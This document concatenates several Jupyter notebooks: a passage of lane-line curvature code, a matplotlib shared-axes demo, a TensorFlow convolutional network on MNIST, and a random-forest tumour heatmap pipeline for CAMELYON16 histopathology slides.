scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
elif orient == 'y':
scaled_sobel = np.uint8(255*abs_sobely/np.max(abs_sobely))
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
binary_output = np.copy(sxbinary)
return binary_output
sobelx_img = abs_sobel_thresh(binary_warped, 'x', 10, 100)
plt.imshow(sobelx_img, cmap='gray')
hls_image = cv2.cvtColor(binary_warped, cv2.COLOR_BGR2HLS)
s_binary = space_thresh(hls_image[:, :, 2], 80, 255)
#plt.imshow(s_binary, cmap='gray')
out_img, left_fit, right_fit, left_fit_m, right_fit_m, proty = fit_polynomial(sobelx_img)
plt.imshow(out_img)
###Output
_____no_output_____
###Markdown
Determine the curvature of the lane and vehicle position with respect to center.
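For the second-order fit $x = Ay^2 + By + C$ returned by `fit_polynomial`, the radius of curvature at a point $y$ is $$R = \frac{\bigl(1 + (2Ay + B)^2\bigr)^{3/2}}{\lvert 2A\rvert},$$ and `calc_curve` below evaluates exactly this expression, converting $y$ from pixels to meters with `ym_per_pix` first and reporting the result in kilometers.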
###Code
def calc_curve(ym, left_fit_cr, right_fit_cr, ploty):
# Calculation of R_curve (radius of curvature)
ym_per_pix = 30/ym
y_eval = np.max(ploty)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad / 1000, right_curverad / 1000
print(calc_curve(719, left_fit_m, right_fit_m, proty))
###Output
_____no_output_____
###Markdown
Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
###Code
def draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, plot):
y_max = img.shape[0]
ploty = np.linspace(0, y_max - 1, y_max)
color_warp = np.zeros_like(img).astype(np.uint8)
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1]*ploty + right_fit[2]
vehicle_center = img.shape[1] * xm_per_pix / 2
#middle = left_fitx + (right_fitx - left_fitx)/2
    line_left = left_fit_m[0] * (y_max * ym_per_pix) ** 2 + left_fit_m[1] * y_max * ym_per_pix + left_fit_m[2]
    line_right = right_fit_m[0] * (y_max * ym_per_pix) ** 2 + right_fit_m[1] * y_max * ym_per_pix + right_fit_m[2]
middle = (line_right + line_left)/2
dist_from_center = middle - vehicle_center
if dist_from_center > 0:
message = '{:.2f} m right of center'.format(dist_from_center)
else:
message = '{:.2f} m left of center'.format(-1*dist_from_center)
left, right = calc_curve(719, left_fit_m, right_fit_m, plot)
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
font = cv2.FONT_HERSHEY_SIMPLEX
fontColor = (255, 255, 255)
cv2.putText(img, 'Left curvature: {:.2f} km'.format(left), (50, 50), font, 2, fontColor, 2)
cv2.putText(img, 'Right curvature: {:.2f} km'.format(right), (50, 120), font, 2, fontColor, 2)
cv2.putText(img, 'Vehicle is {} '.format(message), (50, 190), font, 2, fontColor, 2)
return cv2.addWeighted(img, 1, newwarp, 0.3, 0)
# The last argument should be in pixel units; calc_curve converts it to meters internally.
output = draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, img.shape[0] - 1)
plt.imshow(output)
###Output
_____no_output_____ |
General/Subplots and Shared Axes.ipynb | ###Markdown
Subplots and Shared Axes
###Code
%matplotlib notebook
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv('weather.csv')
df.head()
days = df[df['MONTH'].isin([1,7]) & (df['DAY'] == 1)].drop(columns='DAY')
days = days.pivot(columns='MONTH',index='TIME')
days.head()
fig, ax = plt.subplots(2,2, sharey='row', sharex='col')
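# sharey='row' gives each row of panels a common y scale (temperature on the top row,
# pressure on the bottom), and sharex='col' gives each column a common x scale (January
# on the left, July on the right), so the four panels are directly comparable without
# repeating tick labels.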
days['TEMP'].plot(subplots=True, ax=ax[0], legend=False)
days['PRESSURE'].plot(subplots=True, ax=ax[1], legend=False);
ax[0][0].set_ylabel("Temperature")
ax[0][0].set_title("January")
ax[0][1].set_title("July")
ax[1][0].set_ylabel("Pressure")
ax[1][0].set_xlabel("Time")
ax[1][1].set_xlabel("Time")
fig.tight_layout()
###Output
_____no_output_____ |
Lectures/Lecture-10/TensorFlow-Examples/3_NeuralNetworks/convolutional_network.ipynb | ###Markdown
Convolutional Neural Network Example. Build a convolutional neural network with TensorFlow. This example is using TensorFlow layers API, see 'convolutional_network_raw' example for a raw TensorFlow implementation with variables. - Author: Aymeric Damien - Project: https://github.com/aymericdamien/TensorFlow-Examples/ CNN Overview  MNIST Dataset Overview. This example is using MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28). More info: http://yann.lecun.com/exdb/mnist/
###Code
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
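# Quick shape check (illustrative); read_data_sets also reserves a validation split by
# default, so the train set reported here can be smaller than the full 60,000 images.
print(mnist.train.images.shape, mnist.test.images.shape)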
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.25 # Dropout, probability to drop a unit
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
# Because Dropout have different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False, is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True, is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op, global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# TF Estimators requires to return a EstimatorSpec, that specify
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn)
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
model.evaluate(input_fn)
# Predict single images
n_images = 4
# Get images from test set
test_images = mnist.test.images[:n_images]
# Prepare the input data
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': test_images}, shuffle=False)
# Use the model to predict the images class
preds = list(model.predict(input_fn))
# Display
for i in range(n_images):
plt.imshow(np.reshape(test_images[i], [28, 28]), cmap='gray')
plt.show()
print("Model prediction:", preds[i])
###Output
INFO:tensorflow:Restoring parameters from /tmp/tmpdhd6F4/model.ckpt-2000
|
notebooks/RFSegmentation.ipynb | ###Markdown
Patch preparation and WSI heat-map prediction
###Code
wsi = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/tumor/tumor_005.tif'
json_filepath = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/lesion_annotations_json/tumor_005.json'
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf/'
os.makedirs(savedir, exist_ok=True)
img_mask_dir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_img_and_mask/'
basename = path_leaf(wsi).replace('.tif', '')
#if basename!= 'tumor_110':
# continue
patchsize = 256
saveto = os.path.join(savedir, basename + '.joblib.pickle')
saveto_original = os.path.join(savedir,
basename + '.original.joblib.pickle')
all_samples = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005.tsv')
if 'img_path' not in all_samples.columns:
assert img_mask_dir is not None, 'Need to provide directory if img_path column is missing'
tile_loc = all_samples.tile_loc.astype(str)
tile_loc = tile_loc.str.replace(' ', '').str.replace(
')', '').str.replace('(', '')
all_samples[['row', 'col']] = tile_loc.str.split(',', expand=True)
all_samples['img_path'] = img_mask_dir + '/' + all_samples[[
'uid', 'row', 'col'
]].apply(
lambda x: '_'.join(x.values.tolist()),
axis=1) + '.img.joblib.pickle'
all_samples['mask_path'] = img_mask_dir + '/' + all_samples[[
'uid', 'row', 'col'
]].apply(
lambda x: '_'.join(x.values.tolist()),
axis=1) + '.mask.joblib.pickle'
if not os.path.isfile('/tmp/white.img.pickle'):
white_img = np.ones(
[patchsize, patchsize, 3], dtype=np.uint8) * 255
joblib.dump(white_img, '/tmp/white.img.pickle')
# Definitely not a tumor and hence all black
if not os.path.isfile('/tmp/white.mask.pickle'):
white_img_mask = np.ones(
[patchsize, patchsize], dtype=np.uint8) * 0
joblib.dump(white_img_mask, '/tmp/white.mask.pickle')
all_samples.loc[all_samples.is_tissue == False,
'img_path'] = '/tmp/white.img.pickle'
all_samples.loc[all_samples.is_tissue == False,
'mask_path'] = '/tmp/white.mask.pickle'
for idx, row in all_samples.iterrows():
f = row['img_path']
if not os.path.isfile(f):
row['savedir'] = img_mask_dir
row['patch_size'] = patchsize
row['index'] = idx
save_images_and_mask(row)
print(all_samples.head())
all_samples.to_csv('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask.tsv',
index=False,
header=True, sep='\t')
testing_init_op, testing_next_batch = input_fn(['/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask_segmented.tsv'],
batch_size)
tumor005_segdf = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_segmented.fixed.segmented.tsv')
tumor005_segdf.head()
n_samples = len(tumor005_segdf.index)
n_samples
slide = WSIReader(wsi, 40)
n_cols = int(slide.dimensions[0] / patchsize)
n_rows = int(slide.dimensions[1] / patchsize)
assert n_rows * n_cols == n_samples, 'Some division error;'
print('Total: {}'.format(n_samples))
"""
def generate_rows(samples, num_samples, batch_size=32):
while True: # Loop forever so the generator never terminates
for offset in range(0, num_samples, batch_size):
batch_samples = samples.iloc[offset:offset + batch_size]
is_tissue = batch_samples.is_tissue.tolist()
is_tumor = batch_samples.is_tumor.astype('int32').tolist()
features = []
batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
for _, batch_sample in batch_samples.iterrows():
row = batch_samples.values
features.append(row)
X_train = np.array(features)
y_train = np.array(labels)
yield X_train, y_train
"""
def generate_rows(samples, num_samples, batch_size=1):
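    # Yields (features, labels) batches: for each patch row the per-patch segmentation
    # summary TSV is loaded and its 46 feature columns form one feature vector, patches
    # without tissue get an all-zero vector, and labels are the binary is_tumor flags.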
while True: # Loop forever so the generator never terminates
for offset in range(0, num_samples, batch_size):
batch_samples = samples.iloc[offset:offset + batch_size]
#is_tissue = batch_samples.is_tissue.tolist()
#is_tumor = batch_samples.is_tumor.astype('int32').tolist()
features = []
labels = []
#batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
for _, batch_sample in batch_samples.iterrows():
row = batch_sample.values
label = int(batch_sample.is_tumor)
if batch_sample.is_tissue:
feature = pd.read_table(os.path.join('/Z/personal-folders/interns/saket/github/pyvirchow', batch_sample.segmented_tsv))
feature = feature.drop(columns=['is_tumor', 'is_tissue'])
assert len(feature.columns) == 46
features.append(feature.loc[0].values)
else:
values = [0.0]*46
features.append(values)
labels.append(label)
X_train = np.array(features, dtype=np.float32)
y_train = np.array(labels)
#print(X_train)
#print(y_train)
yield X_train, y_train
predicted_thumbnails = list()
batch_size = 1
"""
sess.run(testing_init_op)
while True:
try:
testing_features_batch, testing_label_batch = sess.run(testing_next_batch)
except tf.errors.OutOfRangeError:
break
preds = sess.run(infer_op,
feed_dict={X: testing_features_batch})
predicted_thumbnails.append(preds)
"""
true_labels = []
for offset in tqdm_notebook(list(range(0, n_samples, batch_size))):
batch_samples = tumor005_segdf.iloc[offset:offset + batch_size]
X_test, true_label = next(
generate_rows(batch_samples, batch_size))
true_labels.append(true_label)
if batch_samples.is_tissue.nunique(
) == 1 and batch_samples.iloc[0].is_tissue == False:
# all patches in this row do not have tissue, skip them all
#predicted_thumbnails.append(
# np.zeros(batch_size, dtype=np.float32))
predicted_thumbnails.append(0)
else:
preds = sess.run(infer_op,
feed_dict={X: X_test})
predicted_thumbnails.append(preds[0][1])
predicted_thumbnails = np.asarray(predicted_thumbnails)
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf'
saveto = os.path.join(savedir, 'tumor_005.job.pickle')
os.makedirs(savedir, exist_ok=True)
output_thumbnail_preds = predicted_thumbnails.reshape(
n_rows, n_cols)
joblib.dump(output_thumbnail_preds, saveto)
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds, cmap='coolwarm')
plt.colorbar(x)
fig.tight_layout()
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds > 0.5, cmap='gray')
#plt.colorbar(x)
fig.tight_layout()
saver = tf.train.Saver()
saver.save(sess, '/Z/personal-folders/interns/saket/github/pyvirchow/models/random_forest_all_train.tf.model')
df = pd.read_table('../data/patch_df/tumor_001_with_mask_segmented.segmented.tsv')
df1 = df[df.segmented_tsv==df.segmented_tsv]
df1.head()
x = pd.read_table(df1.loc[693, 'segmented_tsv'])
x
x = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_segmented_tumor001/tumor_001_75_63.segmented_summary.tsv')
x
train_samples
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from sklearn.datasets import make_blobs
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
clf = RandomForestClassifier(n_jobs=-1, random_state=0)
features = train_samples.columns
clf.fit(train_samples.loc[:, features[1:]], train_samples.is_tumor)
predictions = clf.predict(validation_samples.loc[:, features[1:]])
print ("Train Accuracy :: {} ".format(accuracy_score(train_samples.is_tumor,
clf.predict(train_samples.loc[:, features[1:]]))))
print ("Test Accuracy :: {} ".format(accuracy_score(validation_samples.is_tumor,
predictions)))
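# Optional check (sketch): cross_val_score is imported above but unused; a k-fold estimate
# on the training patches is usually a less optimistic number than the train accuracy.
cv_scores = cross_val_score(clf, train_samples.loc[:, features[1:]],
                            train_samples.is_tumor, cv=5, n_jobs=-1)
print("5-fold CV accuracy :: {:.3f} +/- {:.3f}".format(cv_scores.mean(), cv_scores.std()))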
importances = clf.feature_importances_
indices = np.argsort(importances)[::-1]
importances
for f in range(train_samples.shape[1]-1):
print("%d. feature %s (%f)" % (f + 1, train_samples.columns[indices[f]+1],
importances[indices[f]]))
std = np.std([tree.feature_importances_ for tree in clf.estimators_],
axis=0)
sns.set_context('talk', font_scale=2)
sns.set_style('white')
fig, ax = plt.subplots(figsize=(10, 10))
ax.set_title('Feature importances')
ax.barh(list(features[1:][indices])[:15], list(importances[indices])[:15],
        xerr=list(std[indices])[:15], align="center")
#ax.set_xticks(range(X.shape[1]), indices)
fig.tight_layout()
fig.savefig('presentation_images/rf_feature_importances.pdf')
###Output
_____no_output_____ |